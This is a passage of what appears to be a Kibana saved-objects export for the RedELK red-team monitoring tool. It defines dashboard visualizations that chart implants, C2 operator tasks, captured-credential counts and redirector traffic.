implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.ip_ext\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Redirector IP\"}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"infra.attack_scenario\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Scenario\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"isDonut\":false,\"labels\":{\"show\":true,\"values\":true,\"last_level\":false,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Top new implants by ext IP address and scenario\"}"}, "coreMigrationVersion": "7.16.2", "id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}], "sort": [1642152856829, 2264], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - TTP Cloud Tag", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"IDs\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"threat.technique.id\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other TTPs\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"TTP\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - TTP Cloud Tag\"}"}, "coreMigrationVersion": "7.16.2", "id": "88db1280-d024-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2266], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"c2.log.type: \\\"implant_newimplant\\\" AND (NOT tags: testsystems_V* )\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "title": "RedELK - Top users with new implants", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Top users with new implants\",\"type\":\"pie\",\"params\":{\"type\":\"pie\",\"addTooltip\":false,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"size\":20,\"order\":\"desc\",\"orderBy\":\"1\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}]}"}, "coreMigrationVersion": "7.16.2", "id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152856829, 2268], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks per host and user", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other users\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other hosts\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Tasks per host and user\"}"}, "coreMigrationVersion": "7.16.2", "id": "a5554e20-d025-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2270], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Credentials captured\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Credentials captured\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Credentials captured\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Credentials over time\"}"}, "coreMigrationVersion": "7.16.2", "id": "ab609c60-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2272], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Techniques tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"signal.rule.threat.technique.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":300,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":14,\"maxFontSize\":58,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - MITRE ATT&CK Techniques tag cloud\"}"}, "coreMigrationVersion": "7.16.2", "id": "abdcd940-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2274], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks per C2 operator", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Tasks launched\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-1d\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Unknown user\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Tasks launched\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Tasks launched\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Tasks launched per operator\"}"}, "coreMigrationVersion": "7.16.2", "id": "afb6ce00-d022-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2276], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Hosts total unique count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"2\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"host.name\",\"customLabel\":\"Hosts\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Hosts total unique count\"}"}, "coreMigrationVersion": "7.16.2", "id": "b19d4790-d35f-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2278], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Downloads\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - CS - Downloads total count\"}"}, "coreMigrationVersion": "7.16.2", "id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2280], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic over time\",\"type\":\"line\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"filters\",\"params\":{\"filters\":[{\"input\":{\"query\":\"redir.backend.name : c2* and tags : \\\"iplist_customer\\\"\",\"language\":\"kuery\"},\"label\":\"C2 traffic - Customer\"},{\"input\":{\"query\":\"redir.backend.name : c2* and tags : \\\"iplist_redteam\\\" \",\"language\":\"kuery\"},\"label\":\"C2 traffic - Red team tests\"},{\"input\":{\"query\":\"redir.backend.name : c2* and not tags: \\\"iplist_customer\\\" and not tags : \\\"iplist_redteam\\\" \",\"language\":\"kuery\"},\"label\":\"C2 traffic - Other\"},{\"input\":{\"query\":\"not redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"Non-C2 traffic\"}]},\"schema\":\"group\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"date_histogram\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-1w\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}},\"schema\":\"segment\"}],\"params\":{\"type\":\"line\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"line\",\"mode\":\"normal\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"interpolate\":\"linear\",\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true,\"fittingFunction\":\"linear\"}}"}, "coreMigrationVersion": "7.16.2", "id": "be08d380-efe9-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2282], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic source table", "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic source table\",\"type\":\"table\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{\"customLabel\":\"Hits\"},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.ip\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Source IP\"},\"schema\":\"bucket\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.as.organization.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":1,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"AS Organisation\"},\"schema\":\"bucket\"},{\"id\":\"4\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"source.geo.country_iso_code\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":1,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":true,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Country\"},\"schema\":\"bucket\"}],\"params\":{\"perPage\":10,\"showPartialRows\":true,\"showMetricsAtAllLevels\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"showTotal\":true,\"totalFunc\":\"sum\",\"percentageCol\":\"Hits\",\"showToolbar\":true}}"}, "coreMigrationVersion": "7.16.2", "id": "cbb7d710-efee-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2284], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Tasks execution timeframe", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"min\",\"schema\":\"metric\",\"params\":{\"field\":\"@timestamp\",\"customLabel\":\"First task\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"max\",\"schema\":\"metric\",\"params\":{\"field\":\"@timestamp\",\"customLabel\":\"Last task\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":24}}},\"title\":\"RedELK - Tasks execution timeframe\"}"}, "coreMigrationVersion": "7.16.2", "id": "ce581930-d361-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2286], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Target host and user selector", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"input_control_vis\",\"aggs\":[],\"params\":{\"controls\":[{\"id\":\"1595867425052\",\"fieldName\":\"host.name\",\"parent\":\"\",\"label\":\"Target host(s)\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_0_index_pattern\"},{\"id\":\"1595867451919\",\"fieldName\":\"user.name\",\"parent\":\"\",\"label\":\"Target user(s)\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_1_index_pattern\"}],\"updateFiltersOnChange\":true,\"useTimeFilter\":false,\"pinFilters\":false},\"title\":\"RedELK - Target host and user selector\"}"}, "coreMigrationVersion": "7.16.2", "id": "d2c7b720-d026-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "control_0_index_pattern", "type": "index-pattern"}, {"id": "rtops", "name": "control_1_index_pattern", "type": "index-pattern"}], "sort": [1642152856829, 2289], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - HTTP Redir traffic per backend", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir traffic per backend\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"filters\",\"params\":{\"filters\":[{\"input\":{\"query\":\"redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"C2 traffic\"},{\"input\":{\"query\":\"not redir.backend.name : c2*\",\"language\":\"kuery\"},\"label\":\"Non-C2 traffic\"}]},\"schema\":\"segment\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"redir.backend.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Backend\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.2", "id": "d625ba60-efe8-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2291], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Credentials total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Credentials\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Credentials total count\"}"}, "coreMigrationVersion": "7.16.2", "id": "dcf86190-d319-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "3fabe620-6c38-11ea-97d6-55783aed877a", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2293], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"c2.log.type: implant_newimplant\",\"language\":\"lucene\"},\"filter\":[],\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\"}"}, "title": "RedELK - New implants over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"New implants over time\",\"type\":\"line\",\"params\":{\"type\":\"line\",\"grid\":{\"categoryLines\":true,\"style\":{\"color\":\"#eee\"},\"valueAxis\":null},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"truncate\":100,\"rotate\":0,\"filter\":true},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Amount of implants\"}}],\"seriesParams\":[{\"show\":\"true\",\"type\":\"line\",\"mode\":\"stacked\",\"data\":{\"label\":\"Amount of implants\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"showCircles\":true,\"interpolate\":\"linear\",\"lineWidth\":5,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"top\",\"times\":[],\"addTimeMarker\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true,\"fittingFunction\":\"linear\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of implants\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"interval\":\"auto\",\"min_doc_count\":1,\"extended_bounds\":{}}}]}"}, "coreMigrationVersion": "7.16.2", "id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.index", "type": "index-pattern"}], "sort": [1642152856829, 2295], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[]}"}, "title": "RedELK - Redirector Traffic All", "uiStateJSON": "{\"mapCenter\":[20.96143961409684,13.007096309476236],\"mapZoom\":2}", "version": 1, "visState": "{\"type\":\"tile_map\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Source 